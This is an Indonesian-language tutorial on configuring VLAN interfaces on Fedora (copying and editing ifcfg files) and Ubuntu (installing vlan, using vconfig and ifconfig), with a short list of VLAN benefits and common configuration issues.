VLAN seperti yang di sandang oleh namanya, di maksudkan membuat banyak LAN secara bersamaan. Keuntungan apa yang akan di peroleh?
  • Performance
  • Kemudahan dalam manajemen.
  • Keamanan
  • Kemudahan membuat backbone / trunk
  • Tidak perlu mengkonfigurasi hardware / server.


Beberapa Masalah Konfigurasi

  • Tidak semua network driver mendukung VLAN. Kadang kala kita perlu mem-patch driver agar mendukung VLAN.
  • MTU mungkin akan bermasalah. Ethernet header akan menjadi lebih panjang dari 14 menjadi 18 byte. Tanda VLAN akan berisi VLAN ID dan prioritas.
  • Jangan menggunakan VLAN ID 1 karena mungkin akan digunakan untuk kebutuhan admin.


Mengkonfigurasi VLAN Untuk Fedora

Bagi anda yang menggunakan Fedora dapat menggunakan cara berikut.
Jika VLAN ID anda 5. Maka kita perlu mengcopy file /etc/sysconfig/network-scripts/ifcfg-eth0 ke /etc/sysconfig/network-scripts/ifcfg-eth0.5
# cp /etc/sysconfig/network-scripts/ifcfg-eth0 /etc/sysconfig/network-scripts/ifcfg-eth0.5 
Agar network cardd yan kita miliki (eth0) sekarang mempunyai network untuk VLAN ID 5. Melalui langkah copy di atas kita akan mempunyai,
eth0 – Network interface kita yang biasa. 
eth0.5 – Virtual interface. 
Jangan di ubah isi file /etc/sysconfig/network-scripts/ifcfg-eth0. Kita perlu mengedit file /etc/sysconfig/network-scripts/ifcfg-eth0.5 menggunakan perintah,
# vi /etc/sysconfig/network-scripts/ifcfg-eth0.5 
Temuka kalimat DEVICE=ifcfg-eth0line dan ganti menjadi
DEVICE=ifcfg-eth0.5 
Tambahkan kalimat,
VLAN=yes 
Pastikan kita mengalokasikan IP address menggunakan DHCP atau statik. Setelah itu kita dapat men-Save file tersebbut. Pastikan informasi gateway hanya ada di file /etc/sysconfig/network, tidak ada di file lainnya.
Restart network:
# /etc/init.d/network restart 
Jika kita ingin mengkonfigurasi VLAN ID 3, maka kita perlu mengcopykan /etc/sysconfig/network-scripts/ifcfg-eth0 ke /etc/sysconfig/network-scripts/ifcfg-eth0.3 dan menjalankan prosedur yang sama di atas.


Mengkonfigurasi VLAN Untuk Ubuntu

Install aplikasi pendukung VLAN menggunakan perintah
# apt-get install vlan
Bagi kita yang menggunakan Ubuntu mungkin akan lebih baik menggunakan perintah vconfig. Program vconfig memungkinkan kita untuk membuat dan membuang VLAN di kernel yang sudah siap VLAN.
Untuk menambahkan VLAN ID 5 lakukan perintah berikut ke network card kita, misalnya eth0,
# vconfig add eth0 5 
Perintah add di atas akan membuat interface VLAN eth0.5. Kita dapat menggunakan perintah ifconfig biasa untuk melihat interface tersebut,
# ifconfig eth0.5 
Untuk mengalokasikan IP address kita dapat menggunakan perintah ifconfig,
# ifconfig eth0.5 192.168.1.100 netmask 255.255.255.0 broadcast 192.168.1.255 up 

Untuk melihat informasi lebih detail tentang interface VLAN yang kita buat dapat menggunakan perintah,
# cat /proc/net/vlan/eth0.5 
Jika kita ingin membuang / men-delete interface VLAN dapat menggunakan perintah,
# ifconfig eth0.5 down 
# vconfig rem eth0.5